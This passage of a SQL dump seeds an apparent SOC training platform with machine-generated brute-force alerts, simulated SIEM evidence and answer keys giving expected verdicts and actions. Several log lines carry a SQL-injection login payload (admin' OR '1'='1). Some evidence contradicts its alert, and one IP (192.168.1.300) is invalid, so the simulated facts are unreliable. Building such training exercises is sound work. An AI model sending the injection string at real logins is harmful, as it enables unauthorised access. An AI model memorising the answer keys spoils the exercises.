ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:12:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.75\\\",\\\"dst_ip\\\":\\\"10.0.1.20\\\",\\\"username\\\":\\\"sysadmin\\\",\\\"hostname\\\":\\\"datacenter01\\\",\\\"failed_attempts\\\":50}\"},{\"timestamp\":\"2026-03-15T20:57:15.915Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:12:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.75\\\",\\\"dst_ip\\\":\\\"10.0.1.20\\\",\\\"username\\\":\\\"sysadmin\\\",\\\"hostname\\\":\\\"datacenter01\\\",\\\"failed_attempts\\\":50}\"},{\"timestamp\":\"2026-03-15T20:56:15.915Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:12:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.75\\\",\\\"dst_ip\\\":\\\"10.0.1.20\\\",\\\"username\\\":\\\"sysadmin\\\",\\\"hostname\\\":\\\"datacenter01\\\",\\\"failed_attempts\\\":50}\"},{\"timestamp\":\"2026-03-15T20:55:15.915Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:12:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.75\\\",\\\"dst_ip\\\":\\\"10.0.1.20\\\",\\\"username\\\":\\\"sysadmin\\\",\\\"hostname\\\":\\\"datacenter01\\\",\\\"failed_attempts\\\":50}\"},{\"timestamp\":\"2026-03-15T20:54:15.915Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:12:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.75\\\",\\\"dst_ip\\\":\\\"10.0.1.20\\\",\\\"username\\\":\\\"sysadmin\\\",\\\"hostname\\\":\\\"datacenter01\\\",\\\"failed_attempts\\\":50}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1659, 'Failed Brute Force Attempt on Web Portal', 'medium', 'Elastic SIEM', 'Detected multiple failed login attempts from a known suspicious IP address targeting the company\'s web portal.', 'Brute Force', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T16:30:45Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.150\",\"dst_ip\":\"192.168.1.300\",\"username\":\"b.adams\",\"hostname\":\"webapp01\",\"failed_attempts\":25}', '2026-03-15 19:37:47', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.150\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"IP involved in unauthorized access attempts\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.300\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Reports\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the target web application\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"b.adams\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Management\",\"verdict\":\"internal\",\"details\":\"User account targeted in the attack\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The IP is associated with unauthorized access attempts, confirming the alert.\"}', 'Beginner', 'SIEM', 3, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.919Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T16:30:45Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.150\\\",\\\"dst_ip\\\":\\\"192.168.1.300\\\",\\\"username\\\":\\\"b.adams\\\",\\\"hostname\\\":\\\"webapp01\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-03-15T20:57:15.919Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T16:30:45Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.150\\\",\\\"dst_ip\\\":\\\"192.168.1.300\\\",\\\"username\\\":\\\"b.adams\\\",\\\"hostname\\\":\\\"webapp01\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-03-15T20:56:15.919Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T16:30:45Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.150\\\",\\\"dst_ip\\\":\\\"192.168.1.300\\\",\\\"username\\\":\\\"b.adams\\\",\\\"hostname\\\":\\\"webapp01\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-03-15T20:55:15.919Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T16:30:45Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.150\\\",\\\"dst_ip\\\":\\\"192.168.1.300\\\",\\\"username\\\":\\\"b.adams\\\",\\\"hostname\\\":\\\"webapp01\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-03-15T20:54:15.919Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T16:30:45Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.150\\\",\\\"dst_ip\\\":\\\"192.168.1.300\\\",\\\"username\\\":\\\"b.adams\\\",\\\"hostname\\\":\\\"webapp01\\\",\\\"failed_attempts\\\":25}\"}],\"query\":\"index=main source=\\\"/var/log/nginx/access.log\\\" | head 100\"}}', 0),
(1660, 'Suspicious SSH Activity from Known Malicious IP', 'critical', 'Wazuh', 'Detected multiple failed SSH login attempts from an IP address with a history of malicious activity.', 'Brute Force', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T18:15:50Z\",\"event_type\":\"login_failure\",\"src_ip\":\"198.51.100.99\",\"dst_ip\":\"10.0.0.15\",\"username\":\"administrator\",\"hostname\":\"sshserver03\",\"failed_attempts\":48}', '2026-03-15 19:37:47', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.99\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"IP reported 600 times for SSH brute force attempts\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the SSH server\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"administrator\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"internal\",\"details\":\"User account targeted in the attack\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The IP is flagged for numerous brute force activities, confirming the attack.\"}', 'Beginner', 'SIEM', 3, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.922Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T18:15:50Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.99\\\",\\\"dst_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"sshserver03\\\",\\\"failed_attempts\\\":48}\"},{\"timestamp\":\"2026-03-15T20:57:15.922Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T18:15:50Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.99\\\",\\\"dst_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"sshserver03\\\",\\\"failed_attempts\\\":48}\"},{\"timestamp\":\"2026-03-15T20:56:15.922Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T18:15:50Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.99\\\",\\\"dst_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"sshserver03\\\",\\\"failed_attempts\\\":48}\"},{\"timestamp\":\"2026-03-15T20:55:15.922Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T18:15:50Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.99\\\",\\\"dst_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"sshserver03\\\",\\\"failed_attempts\\\":48}\"},{\"timestamp\":\"2026-03-15T20:54:15.922Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T18:15:50Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.99\\\",\\\"dst_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"sshserver03\\\",\\\"failed_attempts\\\":48}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0),
(1661, 'Password Spraying Detected Against Internal Web Portal', 'high', 'Elastic SIEM', 'Multiple failed login attempts detected from a single external IP address against the internal web portal, suggesting a password spraying attack.', 'Credential Attack', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T03:12:34Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.10\",\"dst_ip\":\"10.0.0.5\",\"username\":\"user1\",\"hostname\":\"web-portal\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-03-15 19:39:26', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"user1\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal user account\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The external IP was confirmed malicious through OSINT, indicating a true positive attack.\"}', 'Beginner', 'SIEM', 3, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.925Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T03:12:34Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.10\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"user1\\\",\\\"hostname\\\":\\\"web-portal\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.925Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T03:12:34Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.10\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"user1\\\",\\\"hostname\\\":\\\"web-portal\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.925Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T03:12:34Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.10\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"user1\\\",\\\"hostname\\\":\\\"web-portal\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.925Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T03:12:34Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.10\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"user1\\\",\\\"hostname\\\":\\\"web-portal\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.925Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T03:12:34Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.10\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"user1\\\",\\\"hostname\\\":\\\"web-portal\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/nginx/access.log\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1662, 'SSH Brute Force Spike Detected', 'critical', 'Wazuh', 'A significant spike in failed SSH login attempts from a foreign IP address indicates a brute force attack on the server.', 'Brute Force', 'T1110', 1, 'investigating', NULL, '{\"timestamp\":\"2026-03-15T06:45:22Z\",\"event_type\":\"login_failure\",\"src_ip\":\"185.143.223.45\",\"dst_ip\":\"192.168.1.10\",\"username\":\"root\",\"hostname\":\"ssh-server\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-03-15 19:39:26', '2026-03-15 21:15:40', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.143.223.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP frequently involved in brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"root\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Common username targeted in brute force attacks\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"OSINT confirms the external IP as malicious, validating the brute force attack.\"}', 'Beginner', 'SIEM', 3, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.926Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T06:45:22Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"185.143.223.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"root\\\",\\\"hostname\\\":\\\"ssh-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.926Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T06:45:22Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"185.143.223.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"root\\\",\\\"hostname\\\":\\\"ssh-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.926Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T06:45:22Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"185.143.223.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"root\\\",\\\"hostname\\\":\\\"ssh-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.926Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T06:45:22Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"185.143.223.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"root\\\",\\\"hostname\\\":\\\"ssh-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.926Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T06:45:22Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"185.143.223.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"root\\\",\\\"hostname\\\":\\\"ssh-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1663, 'Failed SSH Logins From Known Malicious IP', 'high', 'Azure Sentinel', 'Several failed SSH login attempts from a known malicious IP address detected against a critical server.', 'Brute Force', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T08:15:44Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.77\",\"dst_ip\":\"172.16.0.20\",\"username\":\"admin\",\"hostname\":\"critical-server\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-03-15 19:39:26', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.77\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"172.16.0.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Commonly targeted username in attacks\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The IP\'s history of malicious activity confirms the attack as a true positive.\"}', 'Beginner', 'SIEM', 3, 1, 'ENERGY', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.928Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T08:15:44Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.77\\\",\\\"dst_ip\\\":\\\"172.16.0.20\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"critical-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.928Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T08:15:44Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.77\\\",\\\"dst_ip\\\":\\\"172.16.0.20\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"critical-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.928Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T08:15:44Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.77\\\",\\\"dst_ip\\\":\\\"172.16.0.20\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"critical-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.928Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T08:15:44Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.77\\\",\\\"dst_ip\\\":\\\"172.16.0.20\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"critical-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.928Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T08:15:44Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.77\\\",\\\"dst_ip\\\":\\\"172.16.0.20\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"critical-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1664, 'Unusual Login Activity Detected', 'medium', 'Splunk', 'Single IP address triggered 30 failed login attempts against different accounts on the internal web portal.', 'Credential Attack', 'T1110', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T09:20:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"198.51.100.22\",\"dst_ip\":\"10.0.0.8\",\"username\":\"testuser\",\"hostname\":\"web-portal\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-03-15 19:39:26', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.22\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP known for password spraying attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.8\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"testuser\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal user 